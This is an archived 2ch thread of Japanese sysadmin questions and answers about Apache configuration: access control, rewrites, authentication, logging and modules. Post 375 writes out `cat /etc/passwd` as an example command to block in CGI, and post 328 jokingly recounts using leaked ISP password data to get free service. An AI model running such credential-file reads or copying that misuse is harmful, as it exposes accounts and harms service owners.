Apache関連 Part11

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 2chのread.cgiへ]
Update time : 05/25 02:51 / Filesize : 204 KB / Number-of Response : 829
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

Apache関連 Part11

1 名前：名無しさん＠お腹いっぱい。 [2008/09/30(火) 08:11:00 ]: HTTP ServerのApacheに関する話題を扱うスレッドです。
httpd.apache.org/

●インストール済みApacheの詳細情報の調べ方
httpd -h　簡易ヘルプ
httpd -v　バージョン情報
httpd -V　コンパイル条件など詳細な情報
httpd -l　静的リンクされたモジュール一覧
httpd -M　現在の設定ファイルで読み込まれるモジュール(2.2以降)

●公式マニュアル
httpd.apache.org/docs/1.3/ Apache 1.3
httpd.apache.org/docs/2.0/ Apache 2.0
httpd.apache.org/docs/2.2/ Apache 2.2

●ディレクティブ一覧
httpd.apache.org/docs/1.3/mod/directives.html
httpd.apache.org/docs/2.0/mod/quickreference.html
httpd.apache.org/docs/2.2/mod/quickreference.html

前スレッド
Apache関連 Part10
pc11.2ch.net/test/read.cgi/unix/1179627714/
306 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/07(土) 23:41:45 ]: Linuxの場合そんなことが出来るのか
俺はFreeBSDだけどprocファイルシステム有効にしよっかな
307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/08(日) 07:54:22 ]: >>306
FreeBSDのprocでは >>305 のようなことはできません。
308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/08(日) 11:04:33 ]: inodeがわかれば何とかなるのかな。
309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/09(月) 03:20:37 ]: Apacheはhttpd.conf開きっぱなしにしないような。
310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 00:27:40 ]: 質問です。特定のipからのアクセスは、robots.txt以外全て拒否しようとして以下のように書きましたが、robots.txtを含めてアクセスを遮断してしまいます。
どこが悪いんでしょうか？

<Location />
Order Allow,Deny
Allow from all
Deny from 1.1.1.1
</Location>

<Files robots.txt>
Order Deny,Allow
Allow from all
</Files>
311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 00:32:09 ]: >>310
httpd.apache.org/docs/2.2/sections.html#mergin
312 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 00:34:59 ]: IPってゆうな。クズ。
313 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 05:26:50 ]: >>312
IPv6からしかアクセスできないようにしたいのかもしれないだろ。
314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 08:46:43 ]: ipって略したらIPv4、ってこともないわけだが。
315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 08:49:22 ]: ip(小文字)っていうのは、iprouteというソフトに入ってるコマンド。
iprouteでのアクセスを遮断したい、という質問だろ。
316 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/14(土) 09:52:05 ]: >>314
もちろん。IPv4だけにしたいのかもしれない。当人に聞いてみろ。
317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/18(水) 03:23:16 ]: IPv9で使いたいのかもしれん
移植がんばれ
318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/28(土) 13:07:02 ]: Apache 1.3でSSIを使うために
AddType text/x-server-parsed-html .html
を追加したのですが、すると
www.mysite.com/
でindex.htmlにアクセスしたとき、ファイルを保存のダイアログが出てしまいます。
（IE6.0です）
なにか回避方法はないでしょうか？
319 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/11/28(土) 13:08:53 ]: >>318
アクセスしてみたけどダイアログ出なかったよ？
320 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/02(水) 06:16:35 ]: 現在、httpd.confで、以下のように、アクセス禁止をしています｡
<Directory "/home/">
Order allow,deny
Allow from all
deny from 116.48.25.＊＊＊
deny from 202.177.48.＊＊＊
deny from 122.20.183.＊＊＊
</Directory>

しかしこれだと、JPGなどの画像ファイルにはアクセスされてしまいます。
これを、画像ファイルだけ遮断させて、HTMLは表示させるということはできないでしょうか?

<Files ~ "\.(gif|png|jpg)$
Order allow,deny
Allow from all
deny from 116.48.25.＊＊＊
deny from 202.177.48.＊＊＊
deny from 122.20.183.＊＊＊
</Files>
これを試してみましたが、機能しませんでした。
321 名前：320 mailto:sage [2009/12/02(水) 06:59:47 ]: <Files ~ "\.(gif|jpe?g|png)$">
Order allow,deny
Allow from all
deny from 116.48.25.＊＊＊
deny from 202.177.48.＊＊＊
deny from 122.20.183.＊＊＊
</Files>
これにしたらいけました
お騒がせしてすいません
322 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/04(金) 17:49:51 ]: wrowe、何やってんの？wrowe。
323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/07(月) 12:05:33 ]: Apache License 2.0ライセンスのjar(改編なし)を梱包した商用製品をリリースする場合についてですが、
ライセンス翻訳には「要求するのは、ユーザーがそのソフトウェアに Apache License のコードが使われていることを知らせる文言を入れることだけである」
とあり、使用ライブラリ名の明記までは書かれていないので、
複数使用していても、
製品マニュアルに「Apache License 2.0のライブラリを使用しています。」と、載せておけばよいのでしょうか？
翻訳だけではライセンスの満たし方がわかりにくいので、その辺わかりやすく解説しているサイト等もありましたら、
教えていただけないでしょうか？
324 名前：名無しさん＠お腹いっぱい。 [2009/12/14(月) 12:44:44 ]: 急な質問で申し訳ないのですが。
わたしのサーバで、/var/www/htmlのWEB公開用ディレクトリにconfが置いてあるみたいなのですが、大丈夫でしょうか。
confにはifcfg-eth0など、ネットワーク関連の設定ファイルが入っています。
このディレクトリにconfをおいた覚えはないのですが、何かのバグですか？
もしくはクラッキングされてしまったのでしょうか。

OSはCentOS5.3です。
325 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/14(月) 13:18:02 ]: 何言ってんの。
326 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/14(月) 13:27:46 ]: >>325以外に返す言葉が見つからない
327 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/19(土) 12:20:18 ]: >>324 そのマシンも、あんたも、多分、大丈夫ではない。
328 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/24(木) 21:19:46 ]: >>324
それで思い出した。
もう１０年以上も前だけど、むかしベッコアメってプロバイダがあってね
そのホームページスペースに自分がアップロードした覚えのないファイルが突如出現したりしてたんだ
ファイル名はcoreなんだけど、当時はcoreの意味がわからなくて、気味悪いからとりあえずFTPでダウンロードしてHEXDUMPしてみたら
中身が/etc/passwordでひっくり返ったことがあった。
サポートに電話してもよくわかないというから、じゃあ自分の持ち物扱いなんだなということで
まぁ、あまりヘンな自慢はできないしアレだけど、その日から数年間ネットの通信料はタダで生活できました。
329 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/24(木) 23:21:48 ]: 10年前と言うことは、不正アクセス禁止法成立前か？
330 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/25(金) 01:03:03 ]: >>329
父性にアクセスしてない気もするが（w
331 名前：名無しさん＠お腹いっぱい。 [2010/01/06(水) 07:15:59 ]: 板違いではあるのですが、Windows XP Professional SP2で、
apache2.2を動かしていて、perl v5.10.0でプログラムを書いていますがうまく動きません。

具体的には、
www.stackasterisk.jp/tech/program/perl04_02.jsp
に書いてある★Dにsleep 10;を書くと、すぐにブラウザが開放されず、
10秒ほど読み込み中の状態になります。

Windowsを使っているのが悪いのでしょうか?
UNIX板の皆さんの意見をお聞かせ下さい。
332 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 08:03:30 ]: >>331
板違い。
pc11.2ch.net/php/
333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/06(水) 09:01:08 ]: >>332
ご指摘どうもです。そちらの板の
perlスレで聞くことにしました。
334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/20(水) 22:43:02 ]: 前々から聞きたいなと思っていたのですが、アクセスログを見ていると、
時々リファラに複数のURIが併記されたものがあります。例えば今さっき来たヤツですが、
yellowinphotograph.net/apage/22875.php,
www.stephenblog.com/?p=867,
210.24.175.20:880/xoops/modules/newbb/viewtopic.php?post_id=19749,
astinweddingordinators.com/2009/12/15/2010-wedding-trends.aspx,
sumissionword.com/submit-link/, www.mah.on.ca/Page7030.aspx,
www.doctorconsult.com.ar/en/component/artforms/?formid=2,
bridsmajor.blog128.fc2.com/blog-entry-15.html, austincar.co.cc/addjob.php,
travelguide.blog.com/travel_leisure/cruises/italy-the-heaven-of-parmesan-and-ham/,
travelguide.blog.com/travel_leisure/asia/indonesia/bali/visit-india-travel-by-visit-tnt-new-report-on-travel-in-india/,
ho.hoorku.com/index.php?option=com_adsmanager&page=write_ad&catid=7&Itemid=0,
job.co.cc/addjob.php
みたいな具合。これは一体何なんですか？
## 上記のすべての URI は、実際のログから取得した文字列に手を入れてあります。
## また長過ぎる行があると言われて跳ねられるので URI の区切れ目で改行しています。
335 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/20(水) 23:15:18 ]: 特定のWikiを狙い撃ちしてる
336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 00:00:28 ]: Webサイト管理者への宣伝なんじゃねーの？
337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 03:34:30 ]: 自動でリファラ表示するサイト向けの宣伝、とか。
いずれにせよあんまり気にしてもしょうがないと思う。
338 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 06:43:52 ]: うちだと複数のURLがつながってるのは無いけど、どっかのアフィブログのURLがくっついてるのはよくあるな
339 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 08:47:11 ]: SEO？
340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 09:43:51 ]: >>339
SEOとは何を略した言葉で何を意味するのかわかっていれば
そんなことは言えないと思うんだ
341 名前：名無しさん＠お腹いっぱい。 [2010/01/21(木) 13:11:38 ]: 2ch型の掲示板みたいなの(というか主にlog置場)を作りたいんですが、
cgi-binの下に dat/ と subject.txt を置くと error.log に

attempt to invoke directory as script: C:/xampp/cgi-bin/○○○/

と出てしまいますが、httpd.conf の書き方が間違っているんでしょうか?
それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
教えてください。
342 名前：341 mailto:sage [2010/01/21(木) 13:24:29 ]: ここ↓みたいな感じにできればいいなと思っているんですが。
navi2ch.sourceforge.net/log/
343 名前：341 mailto:sage [2010/01/21(木) 13:28:13 ]: 書き忘れました。 httpd.confにはこう書ました。

<Directory c:/xampp/cgi-bin/○○○/>
Options Indexes
Order allow,deny
Allow from all
</Directory>
344 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 13:31:15 ]: >>342
これは単にファイルが置いてあるだけだよ。
CGIとか関係ない。
345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 13:33:16 ]: >>341
> それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
はい。
346 名前：341 mailto:sage [2010/01/21(木) 13:40:11 ]: >>344
それは分っているのですが、ファイル収集のためにcgiを書ました。
>>345
そうなんんですか!? 2chもてっきりそうなってると思ってたんですが、
よくみると2chのスレのURLにはcgi-binって入ってませんね。。。
monazilla とかで2chがどうなっているか聞いたほうがいいんでしょうか。
347 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/21(木) 13:44:59 ]: >>346
2chでも
pc12.2ch.net/unix/subject.txt
pc12.2ch.net/unix/dat/1222729860.dat
とかはただ置いてあるだけ。
CGIは経由していない。

ファイル収集はまた別の話。区別しろ。
348 名前：341 mailto:sage [2010/01/21(木) 13:54:28 ]: >>347
なるほど。考えなおします。ありがとうございました。
349 名前：341 mailto:sage [2010/01/21(木) 16:49:48 ]: 御陰さまでJaneとLive2chで読み込めるのを確認できました。
どうもありがとうございました。
350 名前：334 mailto:sage [2010/01/22(金) 01:42:03 ]: >>335-338　ご意見をありがとうございます。
もしかしたら、と思って自分の blog で弾かれている trackback のリストと apache のログを照合すると、
そのまんまピッタリでした。というわけで、なんかトラックバック・スパム？みたいなもののようです。
実害は無いので無視しておくことにします。
351 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/28(木) 17:37:41 ]: FreeBSD(fsdb使えれば)はinodeわかればln(fdsbのコマンド)できる。
zfsでのサルベージ方法教えろ。
352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/28(木) 19:50:45 ]: 頭お菓子な人が来たー
353 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/02(火) 03:27:25 ]: まさにスイーツ(笑)
354 名前：名無しさん＠お腹いっぱい。 [2010/02/26(金) 18:40:21 ]: すみません。
起動中のApacheのMPMがPreforkかWorkerかのどちらであるか調べるコマンドありますか？
Apache 2.0系です。
355 名前：名無しさん＠お腹いっぱい。 [2010/02/26(金) 20:43:36 ]: >>354
環境がわからないけどこんな感じ
apachectl -V
apache2ctl -V
356 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 02:00:21 ]: 普通に考えたらそうなんだけど、既に起動中のhttpdが
それと同じバイナリファイルから起動されたものであるの
保証がなかったりするから100%ではないような。
357 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 02:31:42 ]: あぁあるかも
最近の鯖はCPUはやくてメモリーもたくさん詰めるから
httpd複数立てたほうが効率的だったりするんだよね
ServerLimitとかMaxClientsの上限低すぎるとおもうなー
動画配信とかで1プロセスあたりコネクトしてる時間が異様に長い子沢山なサーバってどういうMax/Limit設定にしてるんだろ?
358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 13:42:24 ]: >>356
Apache Server Informationとか
359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 14:48:32 ]: リブートできる権限があるならMPMを確認した上でリブートしてしまうのが
360 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 14:51:13 ]: .htaccessが使えるならこの辺を組み合わせるとか。
<IfModule mpm_prefork_module>
<IfModule mpm_worker_module>
SetEnvIf
361 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/27(土) 19:00:33 ]: workerかpreforkならpsでスレッド情報まで出すオプション付ければ良いんじゃない？
362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/03/01(月) 01:28:32 ]: straceで追いかければ動作の違いから判定できるかな？
あと、TeXとかEmacsみたいに任意のプロセスイメージを実行ファイルに
ダンプしてくれるコマンドがあったから、それでダンプして-Vとか。
363 名前：名無しさん＠お腹いっぱい。 mailto:sega [2010/03/24(水) 19:42:20 ]: BASIC認証で使っていい文字ってどんなの？
364 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/03/25(木) 04:35:58 ]: >>363
abt-archi.com/manual/programs/htpasswd.html#restrictions
「:」がイリーガルキャラクタ
255文字以下であること
あと、AuthName　は文字コードを渡せないから日本語だとブラウザによって文字化けする
365 名前：名無しさん＠お腹いっぱい。 [2010/04/05(月) 09:40:25 ]: /var/log/httpdを見ていて気づいたのですが、
ログファイルのオーナーがrootになっています。
User apache
Group apache
として、デーモンはapacheユーザで走らせているのに関わらずです。
何故このような動作をするのでしょうか？
366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/05(月) 10:50:12 ]: 親プロセスがrootだから。
367 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/09(金) 16:36:25 ]: CGIプログラムを作ってて、今までは家のテストサーバーで動かしてたのですが、
だいぶバグも取れてきたので、VPSを借りて公開してみようかと思っています。

そこで質問なんですが、公開する場合、やはりApacheの設定とかってかなり
セキュリティを意識してやらないといけないでしょうか？
家のテストサーバーはCentOSの入門書に書いてあった通り、とりあえずCGIを
使えるように設定しただけなんですが、この程度の知識でVPSでCGIプログラム
を公開するのは無謀ですか？

またお勧めのサイトや書籍等も教えてください。　よろ
368 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/09(金) 16:41:58 ]: Linuxの話はLinux板で。
369 名前：367 mailto:sage [2010/04/09(金) 16:48:01 ]: >>368

すみません>>367の質問はApacheの設定についての質問の
つもりなんですが・・・
Linux板にApacheスレが見つからなかったもんで・・・
370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/09(金) 16:58:13 ]: >>368
「Linuxの話はLinux板で」という返しは年寄りスレで。
371 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/09(金) 16:59:35 ]: >>369
くだ質スレでいいよ。
372 名前：367 mailto:sage [2010/04/09(金) 17:04:08 ]: >>371

行ってきます
373 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/04/09(金) 19:57:36 ]: レンタルサーバー板
pc11.2ch.net/hosting/
374 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/05/09(日) 10:40:41 ]: ファイルには更新日時がつくのですが、ディレクトリにアクセスして、DirectoryIndexにあるデフォルトのhtmlファイルが表示された際に、
更新日時が送られません。
更新日時を送るようにするにはどうしたらよいものでしょうか？
375 名前：名無しさん＠お腹いっぱい。 [2010/06/13(日) 22:55:01 ]: suexecでperlをCGIで動かしてるんですが
`cat /etc/passwd`;とか
system("/usr/bin/foo");
とかユーザがコマンドを実行できないようにするには
どう対処すればいいでしょうか？
376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/06/18(金) 04:01:40 ]: パーミッションを700にすればいいんじゃないの
377 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/06/18(金) 07:15:55 ]: 質問です。

友人の鯖で、cssが遅いです。

Fedora12
apache 2.2.15

GET hoge.css
をすると、
?/p?$???E??稟@?@??凄w?1??P狒9??LP ?s??HTTP/1.1 200 OK
Date: Wed, 16 Jun 2010 22:00:12 GMT
Server: Apache/2.2.15

1行目が文字化けの余計なレスポンスが
結局cssは適用されるんだけど、読み込むまでに15秒とか掛かっています。

mime.type と文字コードの確認はしました。
後考えられる原因は何があるでしょうか？
宜しければ教えて下さい。お願い致します。
378 名前：名無しさん＠お腹いっぱい。 [2010/06/26(土) 18:48:52 ]: こういうURLを
aaaa.net/uploda/img/aaaa989141.jpg

のように置き換えるにはどうしたらいいでしょうか?
↓

aaaa.net/uploda/index.php?=98914
379 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/08(木) 15:33:52 ]: >>378
小学生レベルだな
RewriteRule ^/uploda/img/aaa(.*)\.jpg /uploda/index.php?=$1
380 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/10(土) 06:09:14 ]: つーか、そもそもの順序が逆だと思うのは俺だけかなぁ・・・
381 名前：378 mailto:sage [2010/07/10(土) 06:24:19 ]: >>379
ありがとう！！！
382 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/11(日) 09:09:43 ]: >>380
俺も見たとき思ったｗ

>>378
これ変換前後が逆じゃね？
383 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/11(日) 15:04:36 ]: aaaa.net/uploda/img/aaaa989141.jpg

↓

aaaa.net/uploda/index.php?=98914

RewriteRule ^/uploda/img/aaaa(.*)\.jpg /uploda/index.php?=$1

*********************

aaaa.net/uploda/index.php?=98914

↓

aaaa.net/uploda/img/aaaa989141.jpg

RewriteRule ^/uploda/img/index.php?=(.*) /uploda/img/aaaa$1.jpg

かな？
384 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/11(日) 18:53:17 ]: 要求は 989141 であって 98914 ではないんだから、それではうまくいかないのでは?
385 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/11(日) 19:00:26 ]: ただの脱字だと思うけどね
386 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2010/07/11(日) 22:01:42 ]: 変換前後が逆だと思ってる香具師は素人
387 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/12(月) 07:29:27 ]: >>378
そろそろ正解を。
388 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/12(月) 09:56:28 ]: >>386
つまり画像ファイルへ直リンされたときはcgi経由のURLに自動的に戻し
アダルト広告を表示させたい、とあなたはそう仰っているわけですね？(ｷﾘｯ
389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/12(月) 13:43:18 ]: >>388
わざわざ出てきて、無知な素人だと必死でアピールしなくても良いぞ。
素人は引っ込んでろよ。ｗｗｗ
390 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/12(月) 18:33:35 ]: 素人はきっと画像ファイルがそこにあるという先入観が取れないんだろうな
391 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/13(火) 22:23:12 ]: RewriteRuleって、Locationセクション内に
書けないんだっけ？
マニュアルだけ見ると、できなさそうな
感じなんだけど…。
392 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/13(火) 22:30:03 ]: 書けるけど、書かないほうがいい
393 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 13:00:49 ]: >>392
どうして？
書けるなら書こうと思ったんだけど。
サイト別にアクセス制限したくて。
394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 16:23:33 ]: ヒント：
　　無限ループ
395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 19:10:59 ]: >>394
もうひとこえ！
396 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 19:17:13 ]: ヒント：
　　こわくね？
397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 19:25:58 ]: 無限ループは発生しないだろ。発生するというなら実例示してよ。
398 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/14(水) 23:33:06 ]: LocationとかDirectory内(ディレクトリコンテキスト)に書くより、
トップレベルとかVirtualHost内(サーバーコンテキスト)に書くほうがはるかに簡単
399 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/20(火) 01:02:03 ]: apache3て何がいいの？
今は2.2を使ってるけど
400 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/20(火) 12:46:26 ]: あれ、2.4のために開発中の2.3を放置していきなり3？
401 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/07/21(水) 18:51:48 ]: >>398
そりゃあそうなんだけど。

＞サイト別にアクセス制限したくて。
とか書きにくいところが困りもの。
トップレベルとVirtualHostセクションは
一回しか書けないんで、記述の
整理がやりにくい。
402 名前：名無しさん＠お腹いっぱい。 [2010/08/04(水) 23:58:52 ]: Ubuntu 10.04 に apt で Apache2.2 をインストールしました。
そのあと以下を見て viewvc をインストールしました。
d.hatena.ne.jp/yaakaito/20090105/1231163794

現在、example.jp/cgi-bin/viewvc.cgi とアクセスすると
自分の Subversion リポジトリを見ることが出来ます。

質問：
/cgi-bin/viewvc.cgi にアクセスが来たときだけBasic認証を掛けたい。
/cgi-bin/hoge.cgi など、viewvc.cgi 以外の cgi にアクセスが来たときは、
これまで通り認証は掛けたくない。
これを実現するにはどのように httpd.conf を書けばいいでしょうか?
403 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/08/05(木) 00:00:22 ]: >>402 の続き：
/etc/apache2/sites-available/default は以下のようになっていて
(apt で apache をインストールした直後)
「ここから追記した」というブロックを追記した後、
example.jp/cgi-bin/viewvc.cgi にアクセスしても認証ダイアログが出ませんでした。

<Directory "/usr/lib/cgi-bin"> のところで AllowOverride None しているから？

<VirtualHost *:80>
　ServerAdmin webmaster@localhost

　DocumentRoot /var/www
　<Directory />
　　Options FollowSymLinks
　　AllowOverride None
　</Directory>
　<Directory /var/www/>
　　Options Indexes FollowSymLinks MultiViews
　　AllowOverride None
　　Order allow,deny
　　allow from all
　</Directory>
404 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/08/05(木) 00:00:40 ]: >>403 の続き：

　ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
　<Directory "/usr/lib/cgi-bin">
　　AllowOverride None
　　Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
　　Order allow,deny
　　Allow from all
　</Directory>　　　　　　　　　　　　　　　　　　　　　　　←ここまで apt でインストールしたときのままの状態

　<Directory "/usr/lib/cgi-bin/viewvc.cgi">　　　　←ここから追記した
　　AuthType Basic
　　AuthName "Subversion Repository"
　　AuthUserFile /etc/apache2/hoge.passwd
　　require valid-user
　</Directory>
～
405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/08/05(木) 02:55:09 ]: >>404
Files
406 名前：名無しさん＠お腹いっぱい。 [2010/08/28(土) 16:13:56 ]: FreeBSD6.2, Apache1.3.42, PHP5.3, Python2.7にてmod_pythonがsegmentasion Faultで落ちました。

んで、mod_wsgiをインストールしようとしたのですが、Pythonを--without-thread指定しないとコンパイルが通りません。
--without-threadを付けてPythonをインストール後、mod_wsgiをインストールしようとすると、PythonのThredを有効にしてインストールしろと怒られます。

何か解決方法はありますか…?orz
407 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/08/28(土) 16:28:21 ]: FreeBSD6(ry 査読中止。
408 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/08/28(土) 18:04:20 ]: もちけつ
409 名前：406 mailto:sage [2010/08/28(土) 21:14:25 ]: あー、うん。

FreeBSD8.0, Apache2.2.16, PHP5.3, MySQL5.1, Python2.7, mod_wsgi3.3 で動きました。

あー、うん、うん、うん…。orz
410 名前：378 [2010/09/19(日) 03:41:24 ]: 自宅サーバー1台
フレッツ光ネクスト回線1本
ルーターは使わずPPPoEで接続しています。

で今使っているプロバイダ1社
これをもう1社追加して、マルチセクション（www.daifukuya.com/photoxp/archives/pppoe-multi-session.html）で
自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、
サーバー側の設定としてどうしたらいいでしょうか?

どうぞよろしくお願いしますm(__)m
411 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 07:35:13 ]: セッションとセクションの違いがわかる大人になってから出直してください。
412 名前：410 mailto:sage [2010/09/19(日) 08:22:56 ]: マルチセッションですね
分かる方いらっしゃいましたらお願いしますm(__)m
413 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 08:35:51 ]: >>378
IPベースのバーチャルホストを使う
414 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 08:37:20 ]: >>410
apache あんまり関係ない．．．
OS のポリシールーティング＋αや
ブロードバンドルータならNATで
別ポートで動かした apache 2つにつなげればいいんじゃね
415 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 08:38:58 ]: OS でPPPoEセッション張ってるならIPベースは確かにいけるね
416 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 08:40:38 ]: OS という表現は変だな
サーバマシンでってことで。

ついでに、サーバマシンに2IP ふれば
ルーターかましててもIPベースだけで
ことが足りるのかな
417 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/19(日) 08:53:46 ]: まてよ、PPPoEってことはiPアドレス不定だから設定ファイルにIPアドレスを書けないな。
その辺は工夫が必要だ。たとえばiptableで固定のIPアドレスに転送するとか、
設定ファイルを動的に書き換えるようにするとか。
418 名前：410 mailto:sage [2010/09/20(月) 13:07:30 ]: 皆さんありがとうございます
>>413のいうバーチャルホストで振り分けする方式にしました
419 名前：Perl忍者 ◆M5ZWRnXOj6 [2010/09/26(日) 17:54:29 ]: mod_perlをubuntu10.01にいれた

... waiting .[Sun Sep 26 17:52:00 2010] [warn] module perl_module is already loaded, skipping

これは読み込まれてるのわかってる
他の場所でよみこまれてる

ここで再読み込みしてる
LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so

<IfModule mod_perl.c>
AddHandler perl-script .cgi
PerlHandler ModPerl::Registry
PerlSendHeader On
</IfModule>

だけど
#LoadModule perl_module /usr/lib/apache2/modules/mod_perl.so
でコメントアウトして

ENVのSERVER_SOFTWAREみても

SERVER_SOFTWARE:Apache/2.2.14 (Ubuntu)
ってだけ
mod_perlってでない　読み込まれてちゃんとロードされてるのにmod_perl
なんでSERVER_SOFTWARE二表示されない　おしえて
420 名前：Perl忍者 ◆M5ZWRnXOj6 [2010/09/26(日) 17:57:24 ]: libapache2-mod-perl2はいれてあるよ
421 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/09/26(日) 18:39:14 ]: ServerTokens じゃないよなまさか・・？
422 名前：Perl忍者 ◆M5ZWRnXOj6 [2010/09/26(日) 20:01:11 ]: サーバー友君だった・・・
無駄にわけやがってファイルきもい
conf.d/securityにかかないときかなかった
423 名前：名無しさん＠お腹いっぱい。 [2010/11/14(日) 18:08:47 ]: ログフォーマットについて質問します。
今ログは
isp.example.com - - [14/Nov/2010:18:05:25 +0900] "GET /foo.htm HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
のような形式なのですが、
GET /foo.htm　ではなく GET example.net/foo.htm
のようにドメインまで表示するようにするには
どうすればいいのでしょうか？
424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/11/14(日) 23:16:29 ]: >>423
よく嫁
httpd.apache.org/docs/2.2/mod/mod_log_config.html#formats
425 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/11/15(月) 02:14:16 ]: >>424
ありがとうございます
426 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/15(水) 13:52:06 ]: 2.2.17のapr_pstrdupにバグ
apr_pallocが確保したメモリは初期化されていない → memcpy(NULL文字コピーされず)
427 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/15(水) 14:06:33 ]: と思ったけど、NULL文字列までコピーしてたので違ったorz
